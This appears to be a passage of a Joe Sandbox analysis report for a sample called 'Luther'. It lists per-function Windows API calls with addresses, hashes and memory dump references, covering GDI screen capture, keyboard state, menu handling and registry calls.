                                                                                                          • Opcode Fuzzy Hash: a72a7cac3f8f3d6a12d26d975f6e06437448a19ce81c7f64f17eec2f023c0cbf
                                                                                                          • Instruction Fuzzy Hash: 23C18274208601AFD714DF14C895F6ABBE1BF44308F64949CF456AB3A2CB72ED46CB91
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 00EB3035
                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00EB3045
                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00EB3051
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00EB305E
                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00EB30CA
                                                                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00EB3109
                                                                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00EB312D
                                                                                                          • SelectObject.GDI32(?,?), ref: 00EB3135
                                                                                                          • DeleteObject.GDI32(?), ref: 00EB313E
                                                                                                          • DeleteDC.GDI32(?), ref: 00EB3145
                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00EB3150
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                          • String ID: (
                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                          • Opcode ID: ff97b72ee787c99abf04e9ef56016ec2ce19e3cedd5eb3cee6635b7565092aa2
                                                                                                          • Instruction ID: 57fac145aeb043dc05a7ce9caf29ed398e5c62f409611f74a9fcfb5ad239045d
                                                                                                          • Opcode Fuzzy Hash: ff97b72ee787c99abf04e9ef56016ec2ce19e3cedd5eb3cee6635b7565092aa2
                                                                                                          • Instruction Fuzzy Hash: 8361E1B5904219AFCB05CFA8DC85EAEBBF6FF48310F208529E955B7250D772A941CB90
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0
                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00ECA990
                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00ECA9A7
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00ECA9B3
                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00ECA9C9
                                                                                                          • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00ECAC15
                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00ECAC33
                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00ECAC54
                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 00ECAC73
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00ECAC95
                                                                                                          • DefDlgProcW.USER32(?,00000005,?), ref: 00ECACBB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                          • String ID: @
                                                                                                          • API String ID: 3962739598-2766056989
                                                                                                          • Opcode ID: 98b70d4bad40248e8c12bebf87be7334554ab3fe9cda25166548b70b49b2c99d
                                                                                                          • Instruction ID: 0b4608ff2b3e111111a19254d4de95a22fae5b4b0702cfc298b1bc4a52058a66
                                                                                                          • Opcode Fuzzy Hash: 98b70d4bad40248e8c12bebf87be7334554ab3fe9cda25166548b70b49b2c99d
                                                                                                          • Instruction Fuzzy Hash: EFB18B31600219DFCF14CF69CA89BAE7BF2BF44708F189079EC44AA295D772A981CB51
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00E952E6
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00E95328
                                                                                                          • _wcslen.LIBCMT ref: 00E95339
                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00E95345
                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00E9537A
                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E953B2
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00E953EB
                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E95445
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00E95477
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E954EF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                          • String ID: ThumbnailClass
                                                                                                          • API String ID: 1311036022-1241985126
                                                                                                          • Opcode ID: 0e4481e06d00534feeea9656d662f672d8849a9938c6ebcf59271c6dcedd4322
                                                                                                          • Instruction ID: a88d37ffe73b657724002a5595934c9efe0b7e32b17c597599f13f8a78a686fd
                                                                                                          • Opcode Fuzzy Hash: 0e4481e06d00534feeea9656d662f672d8849a9938c6ebcf59271c6dcedd4322
                                                                                                          • Instruction Fuzzy Hash: 8491E772104B06AFDF05DF24C895BA9B7E9FF01308F40552DFA9AA2091EB31ED56CB91
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0
                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EC97B6
                                                                                                          • GetFocus.USER32 ref: 00EC97C6
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00EC97D1
                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00EC9879
                                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EC992B
                                                                                                          • GetMenuItemCount.USER32(?), ref: 00EC9948
                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00EC9958
                                                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EC998A
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EC99CC
                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EC99FD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1026556194-4108050209
                                                                                                          • Opcode ID: 9d1cf4a858155919518f577e498e5500216edd602f929bbb2d2cefb68317ad4f
                                                                                                          • Instruction ID: 33002c1ad3b7c19be895b3f3c49d6548ee40ceec283bafe9016660c9449b7b1e
                                                                                                          • Opcode Fuzzy Hash: 9d1cf4a858155919518f577e498e5500216edd602f929bbb2d2cefb68317ad4f
                                                                                                          • Instruction Fuzzy Hash: 12819F715083019FD714CF25CA89FAB7BE8BB89718F00192DF985B7292D772D906CB62
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(00F029C0,000000FF,00000000,00000030), ref: 00E9C973
                                                                                                          • SetMenuItemInfoW.USER32(00F029C0,00000004,00000000,00000030), ref: 00E9C9A8
                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00E9C9BA
                                                                                                          • GetMenuItemCount.USER32(?), ref: 00E9CA00
                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00E9CA1D
                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00E9CA49
                                                                                                          • GetMenuItemID.USER32(?,?), ref: 00E9CA90
                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E9CAD6
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E9CAEB
                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E9CB0C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1460738036-4108050209
                                                                                                          • Opcode ID: 999dec0fec1e96028b261af751bf2b5419009b631dc11946072dd75e122a63e9
                                                                                                          • Instruction ID: 359286ff41967bdf997d03b280f4be0830c1a85645670ee825231f68c76cccfc
                                                                                                          • Opcode Fuzzy Hash: 999dec0fec1e96028b261af751bf2b5419009b631dc11946072dd75e122a63e9
                                                                                                          • Instruction Fuzzy Hash: 84619D70A00249AFDF11EF68CD89EEEBBB8FB05348F241425E916B3291D771AD05CB61
                                                                                                          APIs
                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E9E4D4
                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E9E4FA
                                                                                                          • _wcslen.LIBCMT ref: 00E9E504
                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00E9E554
                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E9E570
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                          • API String ID: 1939486746-1459072770
                                                                                                          • Opcode ID: d4a3bca78059b07550ff6266ff2c726771f9b607275bd308605fdb5f30381de0
                                                                                                          • Instruction ID: a13c421dbe09e93e324de1a20a40de0e7ca625d050f69433e7ecdb48f7f2e408
                                                                                                          • Opcode Fuzzy Hash: d4a3bca78059b07550ff6266ff2c726771f9b607275bd308605fdb5f30381de0
                                                                                                          • Instruction Fuzzy Hash: 32411372504314BAEB00EB648D47EFF77ACDF51711F00246AFE01B6283EB769A05D2A5
                                                                                                          APIs
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EBD6C4
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00EBD6ED
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EBD7A8
                                                                                                            • Part of subcall function 00EBD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00EBD70A
                                                                                                            • Part of subcall function 00EBD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00EBD71D
                                                                                                            • Part of subcall function 00EBD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EBD72F
                                                                                                            • Part of subcall function 00EBD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00EBD765
                                                                                                            • Part of subcall function 00EBD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00EBD788
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EBD753
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                          • API String ID: 2734957052-4033151799
                                                                                                          • Opcode ID: 48844f2af491a79002527c25bfebcca89de0f36ee39f1615facbb1039f64f42b
                                                                                                          • Instruction ID: 74f2a85884240efc344d33cb87fabbe01b79c7d9f742c6bcbaafb577ba9e8298
                                                                                                          • Opcode Fuzzy Hash: 48844f2af491a79002527c25bfebcca89de0f36ee39f1615facbb1039f64f42b
                                                                                                          • Instruction Fuzzy Hash: ED318F75A05129BFDB219B91DC88EFFBB7CEF45754F000076B905F2100EB359E4A9AA0
                                                                                                          APIs
                                                                                                          • timeGetTime.WINMM ref: 00E9EFCB
                                                                                                            • Part of subcall function 00E4F215: timeGetTime.WINMM(?,?,00E9EFEB), ref: 00E4F219
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00E9EFF8
                                                                                                          • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00E9F01C
                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E9F03E
                                                                                                          • SetActiveWindow.USER32 ref: 00E9F05D
                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E9F06B
                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E9F08A
                                                                                                          • Sleep.KERNEL32(000000FA), ref: 00E9F095
                                                                                                          • IsWindow.USER32 ref: 00E9F0A1
                                                                                                          • EndDialog.USER32(00000000), ref: 00E9F0B2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                          • String ID: BUTTON
                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                          • Opcode ID: a457b31fe06b7ff8bfec390849533f5b9c4e31a083c43a3bc4ca958eca01e566
                                                                                                          • Instruction ID: ade70825b81e7db2f189e0e8fa131136aca975bc4aa12c156423e64d29415e60
                                                                                                          • Opcode Fuzzy Hash: a457b31fe06b7ff8bfec390849533f5b9c4e31a083c43a3bc4ca958eca01e566
                                                                                                          • Instruction Fuzzy Hash: 4F219671204208BFEB116F31EC89E667BADF745749B052035FA05F2272CB734C56DA61
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E9F374
                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E9F38A
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E9F39B
                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E9F3AD
                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E9F3BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$_wcslen
                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                          • API String ID: 2420728520-1007645807
                                                                                                          • Opcode ID: b0aee5e54c9498a6068b16364d75e91fe964f67e381a86a93d69cc5d9cf7931b
                                                                                                          • Instruction ID: 47aeab4145702d2ef2f97529b1f79812edd3c539631a5cd975534ce8cd112b69
                                                                                                          • Opcode Fuzzy Hash: b0aee5e54c9498a6068b16364d75e91fe964f67e381a86a93d69cc5d9cf7931b
                                                                                                          • Instruction Fuzzy Hash: BB119E31A9026D79DB20A676DC4AEFF6EBCEBD2B40F40243AB941F20D0DAB05945C5A1
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 00E63007
                                                                                                            • Part of subcall function 00E62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4), ref: 00E62D4E
                                                                                                            • Part of subcall function 00E62D38: GetLastError.KERNEL32(00F01DC4,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4,00F01DC4), ref: 00E62D60
                                                                                                          • _free.LIBCMT ref: 00E63013
                                                                                                          • _free.LIBCMT ref: 00E6301E
                                                                                                          • _free.LIBCMT ref: 00E63029
                                                                                                          • _free.LIBCMT ref: 00E63034
                                                                                                          • _free.LIBCMT ref: 00E6303F
                                                                                                          • _free.LIBCMT ref: 00E6304A
                                                                                                          • _free.LIBCMT ref: 00E63055
                                                                                                          • _free.LIBCMT ref: 00E63060
                                                                                                          • _free.LIBCMT ref: 00E6306E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID: &
                                                                                                          • API String ID: 776569668-2586148540
                                                                                                          • Opcode ID: 4e8a6b57f704e00e404d1d46265f37d3a57bfdd3d0cfe65f6cd95fc90f86d3ab
                                                                                                          • Instruction ID: 16204c70300424e4005caec727e1809dc31ee2e830c8d643c932d8410798f7c7
                                                                                                          • Opcode Fuzzy Hash: 4e8a6b57f704e00e404d1d46265f37d3a57bfdd3d0cfe65f6cd95fc90f86d3ab
                                                                                                          • Instruction Fuzzy Hash: 3A11B976140508BFCB01EF94D842CDD3BA5EF163D0B8194A9FA08EF222D632DE519B50
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 00E9A9D9
                                                                                                          • SetKeyboardState.USER32(?), ref: 00E9AA44
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00E9AA64
                                                                                                          • GetKeyState.USER32(000000A0), ref: 00E9AA7B
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00E9AAAA
                                                                                                          • GetKeyState.USER32(000000A1), ref: 00E9AABB
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00E9AAE7
                                                                                                          • GetKeyState.USER32(00000011), ref: 00E9AAF5
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00E9AB1E
                                                                                                          • GetKeyState.USER32(00000012), ref: 00E9AB2C
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00E9AB55
                                                                                                          • GetKeyState.USER32(0000005B), ref: 00E9AB63
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: a6545fd3f1fbe6819ed3dc3e50bdcebb13d0d53e3cc82649619731de2e2f29cf
                                                                                                          • Instruction ID: 36994af1ed8adca4334d393d48d4172f5a2a47d3b1000719bf0b44b18c4da06b
                                                                                                          • Opcode Fuzzy Hash: a6545fd3f1fbe6819ed3dc3e50bdcebb13d0d53e3cc82649619731de2e2f29cf
                                                                                                          • Instruction Fuzzy Hash: B4510720A047882AFF31DB649950BEABFF59F41348F0C55A9D5C22B1C2DA649B4CC7A3
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00E96649
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00E96662
                                                                                                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E966C0
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00E966D0
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00E966E2
                                                                                                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E96736
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00E96744
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00E96756
                                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E96798
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00E967AB
                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E967C1
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E967CE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3096461208-0
